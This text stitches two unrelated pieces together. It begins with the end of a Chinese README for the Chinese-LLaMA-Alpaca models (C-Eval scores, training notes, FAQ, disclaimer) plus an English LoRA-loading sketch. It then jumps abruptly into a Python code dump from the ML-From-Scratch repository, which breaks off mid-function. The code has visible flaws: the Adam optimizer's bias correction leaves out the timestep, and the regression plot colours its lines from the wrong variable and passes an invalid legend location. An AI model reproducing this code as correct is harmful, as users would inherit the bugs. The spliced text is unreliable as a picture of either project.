为了快速评测相关模型的实际文本生成表现,本项目在给定相同的prompt的情况下,在一些常见任务上对比测试了本项目的中文Alpaca-7B、中文Alpaca-13B、中文Alpaca-33B、中文Alpaca-Plus-7B、中文Alpaca-Plus-13B的效果。生成回复具有随机性,受解码超参、随机种子等因素影响。以下相关评测并非绝对严谨,测试结果仅供晾晒参考,欢迎自行体验。 - 详细评测结果及生成样例请查看[examples目录](./examples) - 📊 Alpaca模型在线对战:[http://llm-arena.ymcui.com](http://llm-arena.ymcui.com/) ### 客观效果评测 
本项目还在“NLU”类客观评测集合上对相关模型进行了测试。这类评测的结果不具有主观性,只需要输出给定标签(需要设计标签mapping策略),因此可以从另外一个侧面了解大模型的能力。本项目在近期推出的[C-Eval评测数据集](https://cevalbenchmark.com)上测试了相关模型效果,其中测试集包含12.3K个选择题,涵盖52个学科。以下是部分模型的valid和test集评测结果(Average),完整结果请参考[技术报告](https://arxiv.org/abs/2304.08177)。 | 模型 | Valid (zero-shot) | Valid (5-shot) | Test (zero-shot) | Test (5-shot) | | ----------------------- | :---------------: | :------------: | :--------------: | :-----------: | | Chinese-Alpaca-Plus-33B | 46.5 | 46.3 | 44.9 | 43.5 | | Chinese-Alpaca-33B | 43.3 | 42.6 | 41.6 | 40.4 | | Chinese-Alpaca-Plus-13B | 43.3 | 42.4 | 41.5 | 39.9 | | Chinese-Alpaca-Plus-7B | 36.7 | 32.9 | 36.4 | 32.3 | | Chinese-LLaMA-Plus-33B | 37.4 | 40.0 | 35.7 | 38.3 | | Chinese-LLaMA-33B | 34.9 | 38.4 | 34.6 | 39.5 | | Chinese-LLaMA-Plus-13B | 27.3 | 34.0 | 27.8 | 33.3 | | Chinese-LLaMA-Plus-7B | 27.3 | 28.3 | 26.9 | 28.4 | 需要注意的是,综合评估大模型能力仍然是亟待解决的重要课题,合理辩证地看待大模型相关各种评测结果有助于大模型技术的良性发展。推荐用户在自己关注的任务上进行测试,选择适配相关任务的模型。 C-Eval推理代码请参考本项目 >>> [📚 GitHub Wiki](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/C-Eval评测结果与脚本) ## 训练细节 整个训练流程包括词表扩充、预训练和指令精调三部分。 - 本项目的模型均在原LLaMA词表的基础上扩充了中文单词,代码请参考[merge_tokenizers.py](./scripts/merge_tokenizer/merge_tokenizers.py) - 预训练和指令精调代码参考了🤗transformers中的[run_clm.py](https://github.com/huggingface/transformers/blob/main/examples/pytorch/language-modeling/run_clm.py)和[Stanford Alpaca](https://github.com/tatsu-lab/stanford_alpaca)项目中数据集处理的相关部分 - 已开源用于预训练和指令精调的训练脚本:[预训练脚本Wiki](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/预训练脚本)、[指令精调脚本Wiki](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/指令精调脚本) 具体内容请参考本项目 >>> [📚 GitHub Wiki](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/训练细节) ## FAQ FAQ中给出了常见问题的解答,请在提Issue前务必先查看FAQ。 ``` 问题1:为什么不能放出完整版本权重? 问题2:后面会有33B、65B的版本吗? 问题3:一些任务上效果不好! 问题4:为什么要扩充词表?直接在原版LLaMA上用中文预训练不行吗? 问题5:回复内容很短 问题6:Windows下,模型无法理解中文、生成速度很慢等问题 问题7:Chinese-LLaMA 13B模型没法用llama.cpp启动,提示维度不一致 问题8:Chinese-Alpaca-Plus效果很差 问题9:模型在NLU类任务(文本分类等)上效果不好 问题10:为什么叫33B,不应该是30B吗? 
问题11:模型合并之后SHA256不一致 ``` 具体问题和解答请参考本项目 >>> [📚 GitHub Wiki](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/常见问题) ## 局限性 虽然本项目中的模型具备一定的中文理解和生成能力,但也存在局限性,包括但不限于: - 可能会产生不可预测的有害内容以及不符合人类偏好和价值观的内容 - 由于算力和数据问题,相关模型的训练并不充分,中文理解能力有待进一步提升 - 暂时没有在线可互动的demo(注:用户仍然可以自行在本地部署) ## 引用 如果您觉得本项目对您的研究有所帮助或使用了本项目的代码或数据,请参考引用本项目的技术报告:https://arxiv.org/abs/2304.08177 ``` @article{chinese-llama-alpaca, title={Efficient and Effective Text Encoding for Chinese LLaMA and Alpaca}, author={Cui, Yiming and Yang, Ziqing and Yao, Xin}, journal={arXiv preprint arXiv:2304.08177}, url={https://arxiv.org/abs/2304.08177}, year={2023} } ``` ## 相关项目 | 项目名称 | 简介 | 类型 | | :----------------------------------------------------------- | :----------------------------- | :----: | | [**Chinese-LLaMA-Alpaca-2**](https://github.com/ymcui/Chinese-LLaMA-Alpaca-2)(官方项目) | 中文LLaMA-2、Alpaca-2大模型 | 文本 | | [**Visual-Chinese-LLaMA-Alpaca**](https://github.com/airaria/Visual-Chinese-LLaMA-Alpaca)(官方项目) | 多模态中文LLaMA & Alpaca大模型 | 多模态 | 想要加入列表?>>> [提交申请](https://github.com/ymcui/Chinese-LLaMA-Alpaca/discussions/740) ## 致谢 本项目基于以下开源项目二次开发,在此对相关项目和研究开发人员表示感谢。 | 基础模型、代码 | 量化、推理、部署 | 数据 | | :----------------------------------------------------------: | :----------------------------------------------------------: | :----------------------------------------------------------: | | [LLaMA by Facebook](https://github.com/facebookresearch/llama)<br/>[Alpaca by Stanford](https://github.com/tatsu-lab/stanford_alpaca)<br/>[alpaca-lora by @tloen](https://github.com/tloen/alpaca-lora) | [llama.cpp by @ggerganov](https://github.com/ggerganov/llama.cpp)<br/>[LlamaChat by @alexrozanski]( https://github.com/alexrozanski/LlamaChat)<br/>[text-generation-webui by @oobabooga](https://github.com/oobabooga/text-generation-webui) | [pCLUE and MT data by @brightmart](https://github.com/brightmart/nlp_chinese_corpus)<br/>[oasst1 by OpenAssistant](https://huggingface.co/datasets/OpenAssistant/oasst1) | ## 免责声明 **本项目相关资源仅供学术研究之用,严禁用于商业用途。** 使用涉及第三方代码的部分时,请严格遵循相应的开源协议。模型生成的内容受模型计算、随机性和量化精度损失等因素影响,本项目不对其准确性作出保证。对于模型输出的任何内容,本项目不承担任何法律责任,亦不对因使用相关资源和输出结果而可能产生的任何损失承担责任。本项目由个人及协作者业余时间发起并维护,因此无法保证能及时回复解决相应问题。 ## 问题反馈 如有问题,请在GitHub Issue中提交。礼貌地提出问题,构建和谐的讨论社区。 - 在提交问题之前,请先查看FAQ能否解决问题,同时建议查阅以往的issue是否能解决你的问题。 - 提交问题请使用本项目设置的Issue模板,以帮助快速定位具体问题。 - 重复以及与本项目无关的issue会被[stable-bot](https://github.com/marketplace/stale)处理,敬请谅解。
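To make the model-merging (合并模型) and 🤗transformers sections above more concrete, here is a minimal, illustrative sketch (not part of the project's official scripts) of loading a Chinese-Alpaca LoRA adapter on top of an already HF-converted original LLaMA with transformers and PEFT. The local base-model path is a placeholder, the Alpaca prompt template and generation settings are omitted, and the merge tutorials linked in the wiki remain the authoritative reference.

```python
# Illustrative sketch only – see the 合并模型 wiki tutorials for the official workflow.
import torch
from transformers import LlamaForCausalLM, LlamaTokenizer
from peft import PeftModel

base_model_dir = "path/to/original-llama-7b-hf"  # placeholder: original LLaMA converted to HF format
lora_model_id = "hfl/chinese-alpaca-lora-7b"     # LoRA weights from the download tables above

# The LoRA package ships the extended Chinese tokenizer (see the directory listing above).
tokenizer = LlamaTokenizer.from_pretrained(lora_model_id)

model = LlamaForCausalLM.from_pretrained(base_model_dir, torch_dtype=torch.float16)
model.resize_token_embeddings(len(tokenizer))    # the extended vocabulary is larger than LLaMA's original
model = PeftModel.from_pretrained(model, lora_model_id)
model.eval()
```

To obtain standalone full-precision weights for quantization with llama.cpp or the other deployment options listed above, follow the online/manual merge tutorials in the 合并模型 section rather than loading the adapter at runtime.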
ML-From-Scratch
a2806c6732eee8d27762edd6d864e0c179d8e9e8
File: setup.py from setuptools import setup, find_packages from codecs import open from os import path __version__ = '0.0.4' here = path.abspath(path.dirname(__file__)) # get the dependencies and installs with open(path.join(here, 'requirements.txt'), encoding='utf-8') as f: all_reqs = f.read().split('\n') install_requires = [x.strip() for x in all_reqs if 'git+' not in x] dependency_links = [x.strip().replace('git+', '') for x in all_reqs if x.startswith('git+')] setup( name='mlfromscratch', version=__version__, description='Python implementations of some of the fundamental Machine Learning models and algorithms from scratch.', url='https://github.com/eriklindernoren/ML-From-Scratch', download_url='https://github.com/eriklindernoren/ML-From-Scratch/tarball/master', license='MIT', packages=find_packages(), include_package_data=True, author='Erik Linder-Noren', install_requires=install_requires, setup_requires=['numpy>=1.10', 'scipy>=0.17'], dependency_links=dependency_links, author_email='[email protected]' ) File: mlfromscratch/__init__.py File: mlfromscratch/reinforcement_learning/__init__.py from .deep_q_network import DeepQNetwork File: mlfromscratch/reinforcement_learning/deep_q_network.py from __future__ import print_function, division import random import numpy as np import gym from collections import deque class DeepQNetwork(): """Q-Learning with deep neural network to learn the control policy. Uses a deep neural network model to predict the expected utility (Q-value) of executing an action in a given state. Reference: https://arxiv.org/abs/1312.5602 Parameters: ----------- env_name: string The environment that the agent will explore. Check: https://gym.openai.com/envs epsilon: float The epsilon-greedy value. The probability that the agent should select a random action instead of the action that will maximize the expected utility. gamma: float Determines how much the agent should consider future rewards. decay_rate: float The rate of decay for the epsilon value after each epoch. min_epsilon: float The value which epsilon will approach as the training progresses. 
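    Example (illustrative sketch, not from the original docs; `build_model` is any
    callable accepting n_inputs / n_outputs keyword arguments, e.g. a small helper
    that returns a NeuralNetwork):
        >>> dqn = DeepQNetwork(env_name='CartPole-v1', epsilon=1, gamma=0.9)
        >>> dqn.set_model(build_model)
        >>> dqn.train(n_epochs=500, batch_size=32)
        >>> dqn.play(n_epochs=10)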
""" def __init__(self, env_name='CartPole-v1', epsilon=1, gamma=0.9, decay_rate=0.005, min_epsilon=0.1): self.epsilon = epsilon self.gamma = gamma self.decay_rate = decay_rate self.min_epsilon = min_epsilon self.memory_size = 300 self.memory = [] # Initialize the environment self.env = gym.make(env_name) self.n_states = self.env.observation_space.shape[0] self.n_actions = self.env.action_space.n def set_model(self, model): self.model = model(n_inputs=self.n_states, n_outputs=self.n_actions) def _select_action(self, state): if np.random.rand() < self.epsilon: # Choose action randomly action = np.random.randint(self.n_actions) else: # Take action with highest predicted utility given state action = np.argmax(self.model.predict(state), axis=1)[0] return action def _memorize(self, state, action, reward, new_state, done): self.memory.append((state, action, reward, new_state, done)) # Make sure we restrict memory size to specified limit if len(self.memory) > self.memory_size: self.memory.pop(0) def _construct_training_set(self, replay): # Select states and new states from replay states = np.array([a[0] for a in replay]) new_states = np.array([a[3] for a in replay]) # Predict the expected utility of current state and new state Q = self.model.predict(states) Q_new = self.model.predict(new_states) replay_size = len(replay) X = np.empty((replay_size, self.n_states)) y = np.empty((replay_size, self.n_actions)) # Construct training set for i in range(replay_size): state_r, action_r, reward_r, new_state_r, done_r = replay[i] target = Q[i] target[action_r] = reward_r # If we're done the utility is simply the reward of executing action a in # state s, otherwise we add the expected maximum future reward as well if not done_r: target[action_r] += self.gamma * np.amax(Q_new[i]) X[i] = state_r y[i] = target return X, y def train(self, n_epochs=500, batch_size=32): max_reward = 0 for epoch in range(n_epochs): state = self.env.reset() total_reward = 0 epoch_loss = [] while True: action = self._select_action(state) # Take a step new_state, reward, done, _ = self.env.step(action) self._memorize(state, action, reward, new_state, done) # Sample replay batch from memory _batch_size = min(len(self.memory), batch_size) replay = random.sample(self.memory, _batch_size) # Construct training set from replay X, y = self._construct_training_set(replay) # Learn control policy loss = self.model.train_on_batch(X, y) epoch_loss.append(loss) total_reward += reward state = new_state if done: break epoch_loss = np.mean(epoch_loss) # Reduce the epsilon parameter self.epsilon = self.min_epsilon + (1.0 - self.min_epsilon) * np.exp(-self.decay_rate * epoch) max_reward = max(max_reward, total_reward) print ("%d [Loss: %.4f, Reward: %s, Epsilon: %.4f, Max Reward: %s]" % (epoch, epoch_loss, total_reward, self.epsilon, max_reward)) print ("Training Finished") def play(self, n_epochs): # self.env = gym.wrappers.Monitor(self.env, '/tmp/cartpole-experiment-1', force=True) for epoch in range(n_epochs): state = self.env.reset() total_reward = 0 while True: self.env.render() action = np.argmax(self.model.predict(state), axis=1)[0] state, reward, done, _ = self.env.step(action) total_reward += reward if done: break print ("%d Reward: %s" % (epoch, total_reward)) self.env.close() File: mlfromscratch/utils/misc.py import progressbar from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt import matplotlib.cm as cmx import matplotlib.colors as colors import numpy as np from mlfromscratch.utils.data_operation import 
calculate_covariance_matrix from mlfromscratch.utils.data_operation import calculate_correlation_matrix from mlfromscratch.utils.data_manipulation import standardize bar_widgets = [ 'Training: ', progressbar.Percentage(), ' ', progressbar.Bar(marker="-", left="[", right="]"), ' ', progressbar.ETA() ] class Plot(): def __init__(self): self.cmap = plt.get_cmap('viridis') def _transform(self, X, dim): covariance = calculate_covariance_matrix(X) eigenvalues, eigenvectors = np.linalg.eig(covariance) # Sort eigenvalues and eigenvector by largest eigenvalues idx = eigenvalues.argsort()[::-1] eigenvalues = eigenvalues[idx][:dim] eigenvectors = np.atleast_1d(eigenvectors[:, idx])[:, :dim] # Project the data onto principal components X_transformed = X.dot(eigenvectors) return X_transformed def plot_regression(self, lines, title, axis_labels=None, mse=None, scatter=None, legend={"type": "lines", "loc": "lower right"}): if scatter: scatter_plots = scatter_labels = [] for s in scatter: scatter_plots += [plt.scatter(s["x"], s["y"], color=s["color"], s=s["size"])] scatter_labels += [s["label"]] scatter_plots = tuple(scatter_plots) scatter_labels = tuple(scatter_labels) for l in lines: li = plt.plot(l["x"], l["y"], color=s["color"], linewidth=l["width"], label=l["label"]) if mse: plt.suptitle(title) plt.title("MSE: %.2f" % mse, fontsize=10) else: plt.title(title) if axis_labels: plt.xlabel(axis_labels["x"]) plt.ylabel(axis_labels["y"]) if legend["type"] == "lines": plt.legend(loc="lower_left") elif legend["type"] == "scatter" and scatter: plt.legend(scatter_plots, scatter_labels, loc=legend["loc"]) plt.show() # Plot the dataset X and the corresponding labels y in 2D using PCA. def plot_in_2d(self, X, y=None, title=None, accuracy=None, legend_labels=None): X_transformed = self._transform(X, dim=2) x1 = X_transformed[:, 0] x2 = X_transformed[:, 1] class_distr = [] y = np.array(y).astype(int) colors = [self.cmap(i) for i in np.linspace(0, 1, len(np.unique(y)))] # Plot the different class distributions for i, l in enumerate(np.unique(y)): _x1 = x1[y == l] _x2 = x2[y == l] _y = y[y == l] class_distr.append(plt.scatter(_x1, _x2, color=colors[i])) # Plot legend if not legend_labels is None: plt.legend(class_distr, legend_labels, loc=1) # Plot title if title: if accuracy: perc = 100 * accuracy plt.suptitle(title) plt.title("Accuracy: %.1f%%" % perc, fontsize=10) else: plt.title(title) # Axis labels plt.xlabel('Principal Component 1') plt.ylabel('Principal Component 2') plt.show() # Plot the dataset X and the corresponding labels y in 3D using PCA. 
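    # (Added note:) Like plot_in_2d above, this relies on _transform(), which keeps the
    # eigenvectors of the covariance matrix with the largest eigenvalues and projects X
    # onto those principal components before scattering the points.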
def plot_in_3d(self, X, y=None): X_transformed = self._transform(X, dim=3) x1 = X_transformed[:, 0] x2 = X_transformed[:, 1] x3 = X_transformed[:, 2] fig = plt.figure() ax = fig.add_subplot(111, projection='3d') ax.scatter(x1, x2, x3, c=y) plt.show() File: mlfromscratch/utils/data_operation.py from __future__ import division import numpy as np import math import sys def calculate_entropy(y): """ Calculate the entropy of label array y """ log2 = lambda x: math.log(x) / math.log(2) unique_labels = np.unique(y) entropy = 0 for label in unique_labels: count = len(y[y == label]) p = count / len(y) entropy += -p * log2(p) return entropy def mean_squared_error(y_true, y_pred): """ Returns the mean squared error between y_true and y_pred """ mse = np.mean(np.power(y_true - y_pred, 2)) return mse def calculate_variance(X): """ Return the variance of the features in dataset X """ mean = np.ones(np.shape(X)) * X.mean(0) n_samples = np.shape(X)[0] variance = (1 / n_samples) * np.diag((X - mean).T.dot(X - mean)) return variance def calculate_std_dev(X): """ Calculate the standard deviations of the features in dataset X """ std_dev = np.sqrt(calculate_variance(X)) return std_dev def euclidean_distance(x1, x2): """ Calculates the l2 distance between two vectors """ distance = 0 # Squared distance between each coordinate for i in range(len(x1)): distance += pow((x1[i] - x2[i]), 2) return math.sqrt(distance) def accuracy_score(y_true, y_pred): """ Compare y_true to y_pred and return the accuracy """ accuracy = np.sum(y_true == y_pred, axis=0) / len(y_true) return accuracy def calculate_covariance_matrix(X, Y=None): """ Calculate the covariance matrix for the dataset X """ if Y is None: Y = X n_samples = np.shape(X)[0] covariance_matrix = (1 / (n_samples-1)) * (X - X.mean(axis=0)).T.dot(Y - Y.mean(axis=0)) return np.array(covariance_matrix, dtype=float) def calculate_correlation_matrix(X, Y=None): """ Calculate the correlation matrix for the dataset X """ if Y is None: Y = X n_samples = np.shape(X)[0] covariance = (1 / n_samples) * (X - X.mean(0)).T.dot(Y - Y.mean(0)) std_dev_X = np.expand_dims(calculate_std_dev(X), 1) std_dev_y = np.expand_dims(calculate_std_dev(Y), 1) correlation_matrix = np.divide(covariance, std_dev_X.dot(std_dev_y.T)) return np.array(correlation_matrix, dtype=float) File: mlfromscratch/utils/__init__.py from .misc import Plot from .data_manipulation import * from .data_operation import * File: mlfromscratch/utils/data_manipulation.py from __future__ import division from itertools import combinations_with_replacement import numpy as np import math import sys def shuffle_data(X, y, seed=None): """ Random shuffle of the samples in X and y """ if seed: np.random.seed(seed) idx = np.arange(X.shape[0]) np.random.shuffle(idx) return X[idx], y[idx] def batch_iterator(X, y=None, batch_size=64): """ Simple batch generator """ n_samples = X.shape[0] for i in np.arange(0, n_samples, batch_size): begin, end = i, min(i+batch_size, n_samples) if y is not None: yield X[begin:end], y[begin:end] else: yield X[begin:end] def divide_on_feature(X, feature_i, threshold): """ Divide dataset based on if sample value on feature index is larger than the given threshold """ split_func = None if isinstance(threshold, int) or isinstance(threshold, float): split_func = lambda sample: sample[feature_i] >= threshold else: split_func = lambda sample: sample[feature_i] == threshold X_1 = np.array([sample for sample in X if split_func(sample)]) X_2 = np.array([sample for sample in X if not split_func(sample)]) return 
np.array([X_1, X_2]) def polynomial_features(X, degree): n_samples, n_features = np.shape(X) def index_combinations(): combs = [combinations_with_replacement(range(n_features), i) for i in range(0, degree + 1)] flat_combs = [item for sublist in combs for item in sublist] return flat_combs combinations = index_combinations() n_output_features = len(combinations) X_new = np.empty((n_samples, n_output_features)) for i, index_combs in enumerate(combinations): X_new[:, i] = np.prod(X[:, index_combs], axis=1) return X_new def get_random_subsets(X, y, n_subsets, replacements=True): """ Return random subsets (with replacements) of the data """ n_samples = np.shape(X)[0] # Concatenate x and y and do a random shuffle X_y = np.concatenate((X, y.reshape((1, len(y))).T), axis=1) np.random.shuffle(X_y) subsets = [] # Uses 50% of training samples without replacements subsample_size = int(n_samples // 2) if replacements: subsample_size = n_samples # 100% with replacements for _ in range(n_subsets): idx = np.random.choice( range(n_samples), size=np.shape(range(subsample_size)), replace=replacements) X = X_y[idx][:, :-1] y = X_y[idx][:, -1] subsets.append([X, y]) return subsets def normalize(X, axis=-1, order=2): """ Normalize the dataset X """ l2 = np.atleast_1d(np.linalg.norm(X, order, axis)) l2[l2 == 0] = 1 return X / np.expand_dims(l2, axis) def standardize(X): """ Standardize the dataset X """ X_std = X mean = X.mean(axis=0) std = X.std(axis=0) for col in range(np.shape(X)[1]): if std[col]: X_std[:, col] = (X_std[:, col] - mean[col]) / std[col] # X_std = (X - X.mean(axis=0)) / X.std(axis=0) return X_std def train_test_split(X, y, test_size=0.5, shuffle=True, seed=None): """ Split the data into train and test sets """ if shuffle: X, y = shuffle_data(X, y, seed) # Split the training data from test data in the ratio specified in # test_size split_i = len(y) - int(len(y) // (1 / test_size)) X_train, X_test = X[:split_i], X[split_i:] y_train, y_test = y[:split_i], y[split_i:] return X_train, X_test, y_train, y_test def k_fold_cross_validation_sets(X, y, k, shuffle=True): """ Split the data into k sets of training / test data """ if shuffle: X, y = shuffle_data(X, y) n_samples = len(y) left_overs = {} n_left_overs = (n_samples % k) if n_left_overs != 0: left_overs["X"] = X[-n_left_overs:] left_overs["y"] = y[-n_left_overs:] X = X[:-n_left_overs] y = y[:-n_left_overs] X_split = np.split(X, k) y_split = np.split(y, k) sets = [] for i in range(k): X_test, y_test = X_split[i], y_split[i] X_train = np.concatenate(X_split[:i] + X_split[i + 1:], axis=0) y_train = np.concatenate(y_split[:i] + y_split[i + 1:], axis=0) sets.append([X_train, X_test, y_train, y_test]) # Add left over samples to last set as training samples if n_left_overs != 0: np.append(sets[-1][0], left_overs["X"], axis=0) np.append(sets[-1][2], left_overs["y"], axis=0) return np.array(sets) def to_categorical(x, n_col=None): """ One-hot encoding of nominal values """ if not n_col: n_col = np.amax(x) + 1 one_hot = np.zeros((x.shape[0], n_col)) one_hot[np.arange(x.shape[0]), x] = 1 return one_hot def to_nominal(x): """ Conversion from one-hot encoding to nominal """ return np.argmax(x, axis=1) def make_diagonal(x): """ Converts a vector into an diagonal matrix """ m = np.zeros((len(x), len(x))) for i in range(len(m[0])): m[i, i] = x[i] return m File: mlfromscratch/utils/kernels.py import numpy as np def linear_kernel(**kwargs): def f(x1, x2): return np.inner(x1, x2) return f def polynomial_kernel(power, coef, **kwargs): def f(x1, x2): return 
(np.inner(x1, x2) + coef)**power return f def rbf_kernel(gamma, **kwargs): def f(x1, x2): distance = np.linalg.norm(x1 - x2) ** 2 return np.exp(-gamma * distance) return f File: mlfromscratch/deep_learning/loss_functions.py from __future__ import division import numpy as np from mlfromscratch.utils import accuracy_score from mlfromscratch.deep_learning.activation_functions import Sigmoid class Loss(object): def loss(self, y_true, y_pred): return NotImplementedError() def gradient(self, y, y_pred): raise NotImplementedError() def acc(self, y, y_pred): return 0 class SquareLoss(Loss): def __init__(self): pass def loss(self, y, y_pred): return 0.5 * np.power((y - y_pred), 2) def gradient(self, y, y_pred): return -(y - y_pred) class CrossEntropy(Loss): def __init__(self): pass def loss(self, y, p): # Avoid division by zero p = np.clip(p, 1e-15, 1 - 1e-15) return - y * np.log(p) - (1 - y) * np.log(1 - p) def acc(self, y, p): return accuracy_score(np.argmax(y, axis=1), np.argmax(p, axis=1)) def gradient(self, y, p): # Avoid division by zero p = np.clip(p, 1e-15, 1 - 1e-15) return - (y / p) + (1 - y) / (1 - p) File: mlfromscratch/deep_learning/activation_functions.py import numpy as np # Collection of activation functions # Reference: https://en.wikipedia.org/wiki/Activation_function class Sigmoid(): def __call__(self, x): return 1 / (1 + np.exp(-x)) def gradient(self, x): return self.__call__(x) * (1 - self.__call__(x)) class Softmax(): def __call__(self, x): e_x = np.exp(x - np.max(x, axis=-1, keepdims=True)) return e_x / np.sum(e_x, axis=-1, keepdims=True) def gradient(self, x): p = self.__call__(x) return p * (1 - p) class TanH(): def __call__(self, x): return 2 / (1 + np.exp(-2*x)) - 1 def gradient(self, x): return 1 - np.power(self.__call__(x), 2) class ReLU(): def __call__(self, x): return np.where(x >= 0, x, 0) def gradient(self, x): return np.where(x >= 0, 1, 0) class LeakyReLU(): def __init__(self, alpha=0.2): self.alpha = alpha def __call__(self, x): return np.where(x >= 0, x, self.alpha * x) def gradient(self, x): return np.where(x >= 0, 1, self.alpha) class ELU(): def __init__(self, alpha=0.1): self.alpha = alpha def __call__(self, x): return np.where(x >= 0.0, x, self.alpha * (np.exp(x) - 1)) def gradient(self, x): return np.where(x >= 0.0, 1, self.__call__(x) + self.alpha) class SELU(): # Reference : https://arxiv.org/abs/1706.02515, # https://github.com/bioinf-jku/SNNs/blob/master/SelfNormalizingNetworks_MLP_MNIST.ipynb def __init__(self): self.alpha = 1.6732632423543772848170429916717 self.scale = 1.0507009873554804934193349852946 def __call__(self, x): return self.scale * np.where(x >= 0.0, x, self.alpha*(np.exp(x)-1)) def gradient(self, x): return self.scale * np.where(x >= 0.0, 1, self.alpha * np.exp(x)) class SoftPlus(): def __call__(self, x): return np.log(1 + np.exp(x)) def gradient(self, x): return 1 / (1 + np.exp(-x)) File: mlfromscratch/deep_learning/__init__.py from .neural_network import NeuralNetwork File: mlfromscratch/deep_learning/optimizers.py import numpy as np from mlfromscratch.utils import make_diagonal, normalize # Optimizers for models that use gradient based methods for finding the # weights that minimizes the loss. 
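# (Added note:) Every optimizer below exposes an update() method that takes the current
# weights plus gradient information and returns the new weights, refining the basic rule
#   w <- w - learning_rate * grad_wrt_w
# with momentum, per-parameter scaling, or running moment estimates.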
# A great resource for understanding these methods: # http://sebastianruder.com/optimizing-gradient-descent/index.html class StochasticGradientDescent(): def __init__(self, learning_rate=0.01, momentum=0): self.learning_rate = learning_rate self.momentum = momentum self.w_updt = None def update(self, w, grad_wrt_w): # If not initialized if self.w_updt is None: self.w_updt = np.zeros(np.shape(w)) # Use momentum if set self.w_updt = self.momentum * self.w_updt + (1 - self.momentum) * grad_wrt_w # Move against the gradient to minimize loss return w - self.learning_rate * self.w_updt class NesterovAcceleratedGradient(): def __init__(self, learning_rate=0.001, momentum=0.4): self.learning_rate = learning_rate self.momentum = momentum self.w_updt = np.array([]) def update(self, w, grad_func): # Calculate the gradient of the loss a bit further down the slope from w approx_future_grad = np.clip(grad_func(w - self.momentum * self.w_updt), -1, 1) # Initialize on first update if not self.w_updt.any(): self.w_updt = np.zeros(np.shape(w)) self.w_updt = self.momentum * self.w_updt + self.learning_rate * approx_future_grad # Move against the gradient to minimize loss return w - self.w_updt class Adagrad(): def __init__(self, learning_rate=0.01): self.learning_rate = learning_rate self.G = None # Sum of squares of the gradients self.eps = 1e-8 def update(self, w, grad_wrt_w): # If not initialized if self.G is None: self.G = np.zeros(np.shape(w)) # Add the square of the gradient of the loss function at w self.G += np.power(grad_wrt_w, 2) # Adaptive gradient with higher learning rate for sparse data return w - self.learning_rate * grad_wrt_w / np.sqrt(self.G + self.eps) class Adadelta(): def __init__(self, rho=0.95, eps=1e-6): self.E_w_updt = None # Running average of squared parameter updates self.E_grad = None # Running average of the squared gradient of w self.w_updt = None # Parameter update self.eps = eps self.rho = rho def update(self, w, grad_wrt_w): # If not initialized if self.w_updt is None: self.w_updt = np.zeros(np.shape(w)) self.E_w_updt = np.zeros(np.shape(w)) self.E_grad = np.zeros(np.shape(grad_wrt_w)) # Update average of gradients at w self.E_grad = self.rho * self.E_grad + (1 - self.rho) * np.power(grad_wrt_w, 2) RMS_delta_w = np.sqrt(self.E_w_updt + self.eps) RMS_grad = np.sqrt(self.E_grad + self.eps) # Adaptive learning rate adaptive_lr = RMS_delta_w / RMS_grad # Calculate the update self.w_updt = adaptive_lr * grad_wrt_w # Update the running average of w updates self.E_w_updt = self.rho * self.E_w_updt + (1 - self.rho) * np.power(self.w_updt, 2) return w - self.w_updt class RMSprop(): def __init__(self, learning_rate=0.01, rho=0.9): self.learning_rate = learning_rate self.Eg = None # Running average of the square gradients at w self.eps = 1e-8 self.rho = rho def update(self, w, grad_wrt_w): # If not initialized if self.Eg is None: self.Eg = np.zeros(np.shape(grad_wrt_w)) self.Eg = self.rho * self.Eg + (1 - self.rho) * np.power(grad_wrt_w, 2) # Divide the learning rate for a weight by a running average of the magnitudes of recent # gradients for that weight return w - self.learning_rate * grad_wrt_w / np.sqrt(self.Eg + self.eps) class Adam(): def __init__(self, learning_rate=0.001, b1=0.9, b2=0.999): self.learning_rate = learning_rate self.eps = 1e-8 self.m = None self.v = None # Decay rates self.b1 = b1 self.b2 = b2 def update(self, w, grad_wrt_w): # If not initialized if self.m is None: self.m = np.zeros(np.shape(grad_wrt_w)) self.v = np.zeros(np.shape(grad_wrt_w)) self.m = self.b1 * 
self.m + (1 - self.b1) * grad_wrt_w self.v = self.b2 * self.v + (1 - self.b2) * np.power(grad_wrt_w, 2) m_hat = self.m / (1 - self.b1) v_hat = self.v / (1 - self.b2) self.w_updt = self.learning_rate * m_hat / (np.sqrt(v_hat) + self.eps) return w - self.w_updt File: mlfromscratch/deep_learning/neural_network.py from __future__ import print_function, division from terminaltables import AsciiTable import numpy as np import progressbar from mlfromscratch.utils import batch_iterator from mlfromscratch.utils.misc import bar_widgets class NeuralNetwork(): """Neural Network. Deep Learning base model. Parameters: ----------- optimizer: class The weight optimizer that will be used to tune the weights in order of minimizing the loss. loss: class Loss function used to measure the model's performance. SquareLoss or CrossEntropy. validation: tuple A tuple containing validation data and labels (X, y) """ def __init__(self, optimizer, loss, validation_data=None): self.optimizer = optimizer self.layers = [] self.errors = {"training": [], "validation": []} self.loss_function = loss() self.progressbar = progressbar.ProgressBar(widgets=bar_widgets) self.val_set = None if validation_data: X, y = validation_data self.val_set = {"X": X, "y": y} def set_trainable(self, trainable): """ Method which enables freezing of the weights of the network's layers. """ for layer in self.layers: layer.trainable = trainable def add(self, layer): """ Method which adds a layer to the neural network """ # If this is not the first layer added then set the input shape # to the output shape of the last added layer if self.layers: layer.set_input_shape(shape=self.layers[-1].output_shape()) # If the layer has weights that needs to be initialized if hasattr(layer, 'initialize'): layer.initialize(optimizer=self.optimizer) # Add layer to the network self.layers.append(layer) def test_on_batch(self, X, y): """ Evaluates the model over a single batch of samples """ y_pred = self._forward_pass(X, training=False) loss = np.mean(self.loss_function.loss(y, y_pred)) acc = self.loss_function.acc(y, y_pred) return loss, acc def train_on_batch(self, X, y): """ Single gradient update over one batch of samples """ y_pred = self._forward_pass(X) loss = np.mean(self.loss_function.loss(y, y_pred)) acc = self.loss_function.acc(y, y_pred) # Calculate the gradient of the loss function wrt y_pred loss_grad = self.loss_function.gradient(y, y_pred) # Backpropagate. 
